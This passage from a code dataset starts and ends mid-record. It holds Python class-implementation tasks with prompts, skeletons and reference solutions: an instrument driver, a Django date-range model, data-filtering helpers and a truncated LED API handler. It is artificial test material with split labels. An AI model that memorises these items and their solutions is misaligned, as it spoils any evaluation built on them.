% self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n", "source": "the_stack_v2_python_sparse", "source_path": "ttt_train_mc_prediction.py", "source_repo": "sw2703/rl_tictactoe", "split": "test", "star_events_count": 0} {"blob_id": "6a192b5d3589512e1186f9a24874c5a71dbb6ea5", "bodies": ["super().__init__(dmm, f'ch{channel}', **kwargs)\nself.channel = channel\nself.dmm = dmm\nself.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\nself.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\nself.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\nself.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))", "if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\nelse:\n raise RuntimeError('Front terminal is active instead of rear terminal.')"], "bodies_text": "<|body_start_0|>\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n<|end_body_1|>\n", "class_docstring": "This is the qcodes driver for a channel of the 2000-SCAN scanner card.", "class_name": "Keithley_2000_Scan_Channel", "detected_licenses": ["GPL-2.0-only", "GPL-2.0-or-later", "MIT"], "format_version": 
"stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n <|body_0|>\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000223", "length_bytes": 2543, "license_type": "permissive", "methods": [{"docstring": "Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class", "name": "__init__", "signature": "def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None"}, {"docstring": "Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result", "name": "_measure", "signature": "def _measure(self, quantity: str) -> str"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005649", "prompt": "Implement the Python class `Keithley_2000_Scan_Channel` described below.\n\nClass description:\nThis is the qcodes driver for a channel of the 2000-SCAN scanner card.\n\nMethod signatures and docstrings:\n- def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None: Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\n- def _measure(self, quantity: str) -> str: Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. 
Args: quantity: Quantity to be measured Returns: Measurement result", "prompted_full_text": "Implement the Python class `Keithley_2000_Scan_Channel` described below.\n\nClass description:\nThis is the qcodes driver for a channel of the 2000-SCAN scanner card.\n\nMethod signatures and docstrings:\n- def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None: Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\n- def _measure(self, quantity: str) -> str: Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\n\n<|skeleton|>\nclass Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n <|body_0|>\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n<|end_body_1|>\n", "revision_id": "e07c9f23339ab00b0f4c4cc46711593d88f7fc84", "skeleton": "<|skeleton|>\nclass Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n <|body_0|>\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. 
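[Annotation] A hypothetical wiring sketch for the same record, showing how the channel class is meant to hang off the parent DMM as a qcodes submodule. The `Keithley_6500` import path and constructor signature are assumptions; `add_submodule` and the parameter-call syntax are standard qcodes. Note the division of labour: `_measure` returns the instrument's raw reply string, and each parameter's `get_parser=float` performs the conversion.

```python
# Import paths assumed from the record's repository layout
# (qcodes_contrib_drivers); only Keithley_2000_Scan matches source_path.
from qcodes_contrib_drivers.drivers.Tektronix.Keithley_6500 import Keithley_6500
from qcodes_contrib_drivers.drivers.Tektronix.Keithley_2000_Scan import (
    Keithley_2000_Scan_Channel,
)

dmm = Keithley_6500('dmm', 'TCPIP0::192.0.2.10::inst0::INSTR')  # address made up
for ch in range(1, 11):  # the 2000-SCAN card carries 10 channels
    dmm.add_submodule(f'ch{ch}', Keithley_2000_Scan_Channel(dmm, ch))

# With the rear terminal selected on the instrument, each parameter call
# routes its channel and reads: SENS:FUNC, ROUT:CLOS, then READ?.
print(dmm.ch3.voltage_dc())
```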
Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n", "source": "the_stack_v2_python_sparse", "source_path": "qcodes_contrib_drivers/drivers/Tektronix/Keithley_2000_Scan.py", "source_repo": "QCoDeS/Qcodes_contrib_drivers", "split": "test", "star_events_count": 32} {"blob_id": "c8c7743fa094ded31aa581a690b015718024a24f", "bodies": ["if not self.start_year and (not self.end_year):\n return ''\nif self.start_year == self.end_year:\n return self.start_year\ndate_parts = [self.start_year, '-', self.end_year]\nreturn ''.join([str(dp) for dp in date_parts if dp is not None])", "if exclude is None:\n exclude = []\nif 'start_year' in exclude or 'end_year' in exclude:\n return\nif self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')"], "bodies_text": "<|body_start_0|>\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n<|end_body_0|>\n\n<|body_start_1|>\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n<|end_body_1|>\n", "class_docstring": "Abstract model with optional start and end years, and a custom dates property to display the date range nicely. 
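[Annotation] In the `DateRange` record beginning above, `dates` is documented to return "a string for display" but hands back the raw `start_year` (an int) when the two years match; a caller that concatenates or compares types would notice. A hypothetical one-line tightening of that branch:

```python
# Hypothetical: keep the return type consistently str, as the docstring says.
if self.start_year == self.end_year:
    return str(self.start_year)
```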
Includes validation that requires end year falls after start year.", "class_name": "DateRange", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-free-unknown"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n <|body_0|>\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n<|end_body_0|>\n\n<|body_start_1|>\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000224", "length_bytes": 2365, "license_type": "permissive", "methods": [{"docstring": "Date or date range as a string for display", "name": "dates", "signature": "def dates(self)"}, {"docstring": "Override to clean fields to make sure start/end year are sensical", "name": "clean_fields", "signature": "def clean_fields(self, exclude=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001106", "prompt": "Implement the Python class `DateRange` described below.\n\nClass description:\nAbstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\n\nMethod signatures and docstrings:\n- def dates(self): Date or date range as a string for display\n- def clean_fields(self, exclude=None): Override to clean fields to make sure start/end year are sensical", "prompted_full_text": "Implement the Python class `DateRange` described below.\n\nClass description:\nAbstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\n\nMethod signatures and docstrings:\n- def dates(self): Date or date range as a string for display\n- def clean_fields(self, exclude=None): Override to clean fields to make sure start/end year are sensical\n\n<|skeleton|>\nclass DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. 
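[Annotation] Also for `DateRange`: the `dates` and `clean_fields` bodies reference `start_year`/`end_year` fields that the record never defines, so the mixin only works on a model that declares them. A minimal sketch of the abstract base the docstring implies; the concrete field type is my assumption (the record only says "optional start and end years"), and `dates` reads like it is meant to be a `@property`.

```python
from django.db import models

class DateRange(models.Model):
    """Abstract base assumed by the record's dates/clean_fields bodies;
    the methods themselves come from the record, not this sketch."""

    start_year = models.PositiveIntegerField(null=True, blank=True)
    end_year = models.PositiveIntegerField(null=True, blank=True)

    class Meta:
        abstract = True  # per the class docstring: an abstract model
```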
Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n <|body_0|>\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n<|end_body_0|>\n\n<|body_start_1|>\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n<|end_body_1|>\n", "revision_id": "6371bb1266d7751af59aeaa3426ef7ac02a1fe17", "skeleton": "<|skeleton|>\nclass DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n <|body_0|>\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n", "source": "the_stack_v2_python_sparse", "source_path": "derrida/common/models.py", "source_repo": "Princeton-CDH/derrida-django", "split": "test", "star_events_count": 13} {"blob_id": "50d7b1ce219368bb0e8e622f1062c326f754ef1b", "bodies": ["if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\nelse:\n return dicts", "sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\nfor sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\nreturn text", "ts = int(date)\ndate = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\nreturn str(date)"], "bodies_text": "<|body_start_0|>\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n<|end_body_0|>\n\n<|body_start_1|>\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return 
text\n<|end_body_1|>\n\n<|body_start_2|>\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n<|end_body_2|>\n", "class_docstring": "Simple auxiliary filtering class", "class_name": "DataFiltering", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataFiltering:\n \"\"\"Simple auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n <|body_0|>\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n <|body_1|>\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n<|end_body_0|>\n\n<|body_start_1|>\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return text\n<|end_body_1|>\n\n<|body_start_2|>\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000225", "length_bytes": 1854, "license_type": "permissive", "methods": [{"docstring": "Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys", "name": "dict_list_slice", "signature": "def dict_list_slice(dicts: list, columns: list) -> list"}, {"docstring": "Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string", "name": "cyrillic_to_latin", "signature": "def cyrillic_to_latin(text: str) -> str"}, {"docstring": "transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format", "name": "timestamp_to_date", "signature": "def timestamp_to_date(date: Union[str, int]) -> str"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005850", "prompt": "Implement the Python class `DataFiltering` described below.\n\nClass description:\nSimple auxiliary filtering class\n\nMethod signatures and docstrings:\n- def dict_list_slice(dicts: list, columns: list) -> list: Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\n- def cyrillic_to_latin(text: str) -> str: Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\n- def timestamp_to_date(date: Union[str, int]) -> str: transforms timestamp date to Y-m-d H:M:S 
format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format", "prompted_full_text": "Implement the Python class `DataFiltering` described below.\n\nClass description:\nSimple auxiliary filtering class\n\nMethod signatures and docstrings:\n- def dict_list_slice(dicts: list, columns: list) -> list: Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\n- def cyrillic_to_latin(text: str) -> str: Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\n- def timestamp_to_date(date: Union[str, int]) -> str: transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\n\n<|skeleton|>\nclass DataFiltering:\n \"\"\"Simple auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n <|body_0|>\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n <|body_1|>\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n<|end_body_0|>\n\n<|body_start_1|>\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return text\n<|end_body_1|>\n\n<|body_start_2|>\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n<|end_body_2|>\n", "revision_id": "7bf107b448cdd0e5d7f1cf85726b06c677ed922d", "skeleton": "<|skeleton|>\nclass DataFiltering:\n \"\"\"Simple auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n <|body_0|>\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n <|body_1|>\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataFiltering:\n \"\"\"Simple 
auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return text\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n", "source": "the_stack_v2_python_sparse", "source_path": "advancedbot/components/utils/datafiltering.py", "source_repo": "sdallaboratory/advanced-telegram-bot", "split": "test", "star_events_count": 6} {"blob_id": "c00591a65be37964410e6721427eb7926fcdb278", "bodies": ["virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\nresponse = {'status': 'success'}\nresponse[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\nif virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\nreturn web.json_response(data=response, status=200)", "virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\ntry:\n data = await request.json()\nexcept JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\nactive = data.get('active')\nif active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\ntry:\n virtual.active = active\nexcept ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\nfor idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\nsave_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\nresponse = {'status': 'success', 'active': virtual.active}\nreturn web.json_response(data=response, status=200)", "virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = 
